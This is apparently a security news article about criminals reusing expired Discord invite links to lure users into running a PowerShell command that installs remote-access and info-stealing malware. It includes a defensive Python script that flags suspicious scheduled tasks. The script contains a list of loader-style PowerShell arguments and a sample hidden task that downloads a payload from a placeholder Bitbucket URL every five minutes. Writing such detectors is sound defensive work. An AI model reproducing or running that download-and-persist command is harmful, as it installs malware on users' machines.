A newly uncovered vulnerability in Discord’s invitation system has opened the door for cybercriminals to spread remote access malware. The flaw enables threat actors to hijack expired or deleted Discord invite links and redirect users to malicious servers. Attackers reuse these recycled invite codes to lure victims into servers they control, and the resulting infections often involve remote access tools and info-stealers.
How Attackers Reuse Discord Invite Links
Discord allows users to generate server invite codes. While most links are random and temporary, boosted servers can create custom, vanity URLs. Once a server loses its boosted status, its unique invite code becomes available again.
Attackers actively monitor these changes. Once a vanity code becomes free, they register it for a malicious server. Researchers at Check Point confirmed that this loophole also applies to expired or deleted invite links.
Furthermore, Discord fails to handle the case sensitivity of invite codes properly. By changing upper-case letters to lowercase, attackers can register duplicate-looking codes. This trick allows them to run parallel fake servers under near-identical URLs.
Fake Verification Traps Lure Victims
After registering the recycled invite code, attackers distribute it across forums, social media, and community sites. These fake servers mimic real ones closely. Usually, visitors see only one channel, labeled #verify.
Inside this channel, a bot initiates a fake verification step. The bot leads users to a counterfeit Discord page. There, the system falsely claims a CAPTCHA error and asks users to run a copied PowerShell command.
Many users comply, thinking the command will fix the issue. Instead, the command triggers the malware infection process.
Malware Delivered in Multiple Stages
The PowerShell command downloads several files in stages. These payloads are hosted on Bitbucket, a legitimate code-hosting platform, which helps the downloads pass as ordinary traffic. Check Point identified three main malware variants used in the campaign:
- AsyncRAT (AClient.exe): Offers remote control, keylogging, and microphone access. It retrieves its command-and-control (C2) server address from Pastebin.
- Skuld Stealer (skul.exe): Steals browser data, crypto wallet information, and Discord tokens. It uses JavaScript injection techniques.
- ChromeKatz (cks.exe): Extracts cookies and saved passwords from browsers.
To maintain persistence, the malware creates a scheduled task. This task re-launches the infection chain every five minutes, so the payload comes back even if a user or security tool removes it.
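The scheduled task described above is one of the few durable artifacts this campaign leaves on a host, so a defender can look for it directly. The following added example, not part of the original article or Check Point's research, inspects a Windows Task Scheduler XML definition (as exported by schtasks /Query /XML) and flags tasks that repeat at a short interval and launch PowerShell with download-style arguments. The sample task and the list of suspicious argument fragments are constructed for illustration.

```python
"""Flag Task Scheduler XML definitions that re-run PowerShell at short intervals."""
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Argument fragments typical of download-and-execute loaders (illustrative, not exhaustive).
SUSPICIOUS_ARGS = ("downloadstring", "invoke-webrequest", "iwr ", "bitbucket.org",
                   "-encodedcommand", "-enc ", "windowstyle hidden", "-w hidden")

def interval_seconds(iso: str) -> int:
    """Convert an ISO-8601 duration such as PT5M or P1DT2H into seconds (0 if unparseable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso.strip())
    if not m:
        return 0
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s

def analyse_task(xml_text: str, max_interval: int = 300) -> dict:
    """Return findings for one task definition; 'alert' is True when all indicators line up."""
    root = ET.fromstring(xml_text)
    findings = {"short_repeat": False, "powershell": False, "suspicious_args": []}
    # Any trigger that repeats every max_interval seconds or less is unusual for user software.
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        secs = interval_seconds(interval.text or "")
        if 0 < secs <= max_interval:
            findings["short_repeat"] = True
    # Inspect each Exec action for a PowerShell host and loader-like arguments.
    for exe in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (exe.findtext("t:Command", "", NS) or "").lower()
        args = (exe.findtext("t:Arguments", "", NS) or "").lower()
        if "powershell" in cmd or "pwsh" in cmd:
            findings["powershell"] = True
            findings["suspicious_args"] = [frag for frag in SUSPICIOUS_ARGS if frag in args]
    findings["alert"] = (findings["short_repeat"] and findings["powershell"]
                         and bool(findings["suspicious_args"]))
    return findings

# Constructed sample task resembling the persistence described in the article (placeholder URL).
SAMPLE_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest https://bitbucket.org/PLACEHOLDER/downloads/stage.bin -OutFile stage.bin"</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(analyse_task(SAMPLE_TASK))
```

Running it over every task exported from a host turns the five-minute re-launch behaviour into a concrete hunting query; tune max_interval and SUSPICIOUS_ARGS to your environment's baseline.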
How to Stay Protected on Discord
To avoid these attacks, always be cautious with Discord invite links—especially older ones shared in forums or chats. Avoid servers that require unexpected verification steps or system commands. Never run PowerShell commands unless you fully understand their origin.
Moreover, Discord server admins should use permanent invites. These are more difficult for attackers to reuse or hijack. It’s also wise to review vanity code usage and monitor for duplicate-like entries.
At Eye World, we recommend businesses educate their teams about social engineering threats. Regular cybersecurity awareness helps reduce the risk of falling for sophisticated scams like this one.